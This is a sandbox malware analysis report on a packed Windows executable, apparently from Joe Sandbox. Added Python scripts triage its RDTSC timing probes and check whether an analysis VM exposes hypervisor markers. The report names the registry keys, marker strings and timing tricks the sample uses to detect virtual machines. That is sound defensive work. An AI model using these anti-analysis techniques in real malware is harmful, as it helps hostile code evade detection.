              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E863F second address: 7E864B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCE8904C1B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E864B second address: 7E8665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FCE88B69071h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA595 second address: 7EA59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA59B second address: 7EA5B4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCE88B69066h 0x00000008 jmp 00007FCE88B6906Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5B4 second address: 7EA5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE8904C1BCh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5C6 second address: 7EA5D7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCE88B69066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50601D5 second address: 5060234 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b jmp 00007FCE8904C1BEh 0x00000010 pushfd 0x00000011 jmp 00007FCE8904C1C2h 0x00000016 or ah, FFFFFFC8h 0x00000019 jmp 00007FCE8904C1BBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007FCE8904C1C6h 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov bl, F4h 0x0000002d mov ax, CA35h 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060234 second address: 506023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506023A second address: 506023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506023E second address: 5060242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50602C4 second address: 50602CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50602CA second address: 506038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B6906Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FCE88B69074h 0x00000010 call 00007FCE88B69072h 0x00000015 pop esi 0x00000016 pop edi 0x00000017 jmp 00007FCE88B69070h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FCE88B6906Eh 0x00000026 sub si, 9998h 0x0000002b jmp 00007FCE88B6906Bh 0x00000030 popfd 0x00000031 mov ch, 03h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FCE88B6906Ch 0x0000003e and ax, C3F8h 0x00000043 jmp 00007FCE88B6906Bh 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007FCE88B69078h 0x0000004f add cx, 9E58h 0x00000054 jmp 00007FCE88B6906Bh 0x00000059 popfd 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE1D second address: 6FEE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FCE8904C1C2h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE47 second address: 6FEE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE4D second address: 6FEE6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE8904C1C9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE6A second address: 6FEE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
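Each "RDTSC instruction interceptor" line above is one window between two consecutive RDTSC executions: the sandbox records the instructions that ran from one time-stamp read to the next. Consecutive windows chain together (the second address of one line is the first address of the next), and almost every window contains nothing but stack shuffling (push/pop, pushad/popad, pushfd/popfd) and jumps. That is the pattern behind the "Tries to detect virtualization through RDTSC time measurements" signature in the overview: the packer samples the counter many times across junk code and compares the deltas, which are far larger when a hypervisor traps RDTSC or a debugger single-steps. The occasional window that carries other instructions (for example 7E71B1 -> 7E7215, with mov/call/ret between the reads) is where the obfuscated program logic actually sits. The following triage script is an added example, not part of the Joe Sandbox report; it parses the lines exactly as printed, chains adjacent windows, and separates padding from real work using a mnemonic heuristic of my own (anything that is not a push/pop family instruction or a jump counts as work). The four sample lines are copied from the report above.

```python
import re

# Report lines copied from the Joe Sandbox output above, with the leading
# "Source: C:\Users\user\Desktop\file.exe" cell dropped.  The first three windows
# are the packer's stack-and-jump padding; the fourth (7E71B1 -> 7E7215) has real
# instructions between the two RDTSC reads.
SAMPLE_LINES = [
    "RDTSC instruction interceptor: First address: 775D79 second address: 775D83 "
    "instructions: 0x00000000 rdtsc 0x00000002 js 00007FCE88B69066h 0x00000008 push eax "
    "0x00000009 push edx 0x0000000a rdtsc",
    "RDTSC instruction interceptor: First address: 775D83 second address: 775DA3 "
    "instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx "
    "0x00000005 pop eax 0x00000006 jp 00007FCE8904C1BCh 0x0000000c push eax 0x0000000d push edx "
    "0x0000000e ja 00007FCE8904C1B6h 0x00000014 jnl 00007FCE8904C1B6h 0x0000001a rdtsc",
    "RDTSC instruction interceptor: First address: 77B611 second address: 77B615 "
    "instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 7E71B1 second address: 7E7215 "
    "instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE8904C1C2h 0x00000008 jmp 00007FCE8904C1BCh "
    "0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax "
    "0x00000012 mov dword ptr [ebp+122D1AB1h], edi 0x00000018 push dword ptr [ebp+122DB645h] "
    "0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FCE8904C1B8h 0x00000026 pop esi "
    "0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Bh "
    "0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret "
    "0x00000038 push 9192C999h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad "
    "0x00000040 jmp 00007FCE8904C1C1h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 popad 0x00000048 rdtsc",
]

ENTRY_RE = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<first>[0-9A-Fa-f]+) "
    r"second address: (?P<second>[0-9A-Fa-f]+) instructions: (?P<body>.+)$"
)
# Joe Sandbox prefixes every instruction with its byte offset inside the executed trace.
OFFSET_RE = re.compile(r"\b0x[0-9a-fA-F]{8}\b")
SPLIT_RE = re.compile(r"\s*\b0x[0-9a-fA-F]{8}\s+")

# Heuristic (mine, not the sandbox's): these mnemonics plus any j* branch are padding.
PADDING = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "nop"}
STACK_EFFECT = {"push": 1, "pushfd": 1, "call": 1, "pushad": 8,
                "pop": -1, "popfd": -1, "ret": -1, "popad": -8}


def mnemonic(insn):
    return insn.split()[0].lower()


def is_padding(insn):
    m = mnemonic(insn)
    return m in PADDING or m.startswith("j")


def stack_delta(insn):
    """Net 32-bit stack slots pushed (+) or popped (-) by one instruction."""
    return STACK_EFFECT.get(mnemonic(insn), 0)


def parse_entry(line):
    """Parse one interceptor line into addresses, executed byte count and the
    instructions strictly between the two RDTSC reads. Returns None for other lines."""
    m = ENTRY_RE.search(line)
    if not m:
        return None
    body = m.group("body")
    offsets = [int(tok, 16) for tok in OFFSET_RE.findall(body)]
    insns = [p.strip() for p in SPLIT_RE.split(body) if p.strip()]
    if len(insns) < 2 or mnemonic(insns[0]) != "rdtsc" or mnemonic(insns[-1]) != "rdtsc":
        return None
    first, second = int(m.group("first"), 16), int(m.group("second"), 16)
    return {
        "first": first,
        "second": second,
        "span_bytes": second - first,   # distance between the two RDTSC sites
        "trace_bytes": offsets[-1],     # bytes actually executed; smaller when a jump was taken
        "window": insns[1:-1],
    }


def chain_windows(entries):
    """Adjacent windows share an RDTSC (second address == next first address);
    group them so padding and stack effects are judged over the whole sequence."""
    chains = []
    for e in entries:
        if chains and chains[-1][-1]["second"] == e["first"]:
            chains[-1].append(e)
        else:
            chains.append([e])
    return chains


def summarize_chain(chain):
    insns = [i for e in chain for i in e["window"]]
    return {
        "start": f"{chain[0]['first']:X}",
        "end": f"{chain[-1]['second']:X}",
        "rdtsc_reads": len(chain) + 1,
        "instructions": len(insns),
        "padding": sum(1 for i in insns if is_padding(i)),
        "work": [i for i in insns if not is_padding(i)],
        "stack_delta": sum(stack_delta(i) for i in insns),
    }


def analyze(lines):
    entries = [e for e in map(parse_entry, lines) if e]
    chains = [summarize_chain(c) for c in chain_windows(entries)]
    return {"windows": len(entries), "chains": chains,
            "chains_with_work": sum(1 for c in chains if c["work"])}


if __name__ == "__main__":
    for c in analyze(SAMPLE_LINES)["chains"]:
        print(f"{c['start']}->{c['end']}: {c['rdtsc_reads']} rdtsc, "
              f"{c['instructions']} insns ({c['padding']} padding), "
              f"stack {c['stack_delta']:+d}, work={c['work']}")
```

Run against the full list of interceptor lines, the chains whose `work` list is empty and whose `stack_delta` is zero are pure timing probes and can be skipped when reconstructing the unpacked code; the few chains with non-padding instructions are the places worth opening in a disassembler. The `span_bytes`/`trace_bytes` mismatch on a window tells you a branch inside it was taken, which is why the interceptor's offsets do not add up to the address distance.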
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 54F9C3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 54F904 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6F24D0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 706A09 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7843C3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
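The three registry reads above are the "Tries to detect sandboxes / dynamic malware analysis system (registry check)" signature from the overview: DriverDesc of the first device under the Display-adapter class key {4d36e968-e325-11ce-bfc1-08002be10318}, plus SystemBiosVersion and VideoBiosVersion. On an unhardened guest those values carry the hypervisor's name (VirtualBox, VMware, QEMU and so on), so a sandbox operator wants to know what their own image exposes there. The script below is an added example and not part of the report; the report does not show which strings the sample compares against, so the marker list is an assumption based on the values hypervisors commonly write, and the two sample value sets are constructed. It runs offline on a dictionary of values and, on a Windows host, can read the same three values through the standard-library winreg module.

```python
# Registry values the sample queries (taken from the report above).  The GUID is
# the Display-adapter device class; "0000" is the first adapter instance.
QUERIED_VALUES = [
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000",
     "DriverDesc"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
]

# Assumption: hypervisor markers commonly found in these values.  The report does
# not reveal the sample's own comparison strings.
HYPERVISOR_MARKERS = ("vbox", "virtualbox", "vmware", "qemu", "bochs", "xen",
                      "parallels", "hyper-v", "virtual")


def normalize(value):
    """SystemBiosVersion is REG_MULTI_SZ and arrives as a list; flatten to one string."""
    if isinstance(value, (list, tuple)):
        value = " ".join(str(v) for v in value)
    return str(value)


def vm_indicators(values):
    """values: {value_name: registry data}.  Returns one (name, data, marker) per
    queried value whose data contains a hypervisor marker (case-insensitive)."""
    hits = []
    for _, name in QUERIED_VALUES:
        data = normalize(values.get(name, ""))
        low = data.lower()
        for marker in HYPERVISOR_MARKERS:
            if marker in low:
                hits.append((name, data, marker))
                break
    return hits


def read_live_values():
    """Read the same three values on a Windows host (winreg is stdlib there).
    Missing keys or values are reported as empty strings rather than raising."""
    import winreg
    out = {}
    for path, name in QUERIED_VALUES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                out[name], _ = winreg.QueryValueEx(key, name)
        except OSError:
            out[name] = ""
    return out


# Constructed samples: what a stock VirtualBox guest and a physical laptop expose.
SAMPLE_VBOX = {
    "DriverDesc": "VirtualBox Graphics Adapter",
    "SystemBiosVersion": ["VBOX   - 1"],
    "VideoBiosVersion": "Oracle VM VirtualBox VBE Adapter",
}
SAMPLE_PHYSICAL = {
    "DriverDesc": "Intel(R) UHD Graphics 620",
    "SystemBiosVersion": ["LENOVO - 1200"],
    "VideoBiosVersion": "Intel Video BIOS",
}


if __name__ == "__main__":
    import sys
    values = read_live_values() if sys.platform == "win32" else SAMPLE_VBOX
    for name, data, marker in vm_indicators(values):
        print(f"{name}: {data!r} matches '{marker}'")
```

If the live check on your analysis VM reports any hits, those are the values to overwrite in the guest image; the check is deliberately as crude as the malware's (substring match, no structure), because that is the bar the sandbox has to clear.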
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27240
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26058
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00313910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00313910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0031E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00311269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00311269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00311250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00311250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00314B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00314B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00312390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00312390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0030DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0030DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0031CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0031DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0031D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00321BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00321BF0
              Source: file.exe, file.exe, 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2087381883.0000000001081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000002.2087381883.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0S
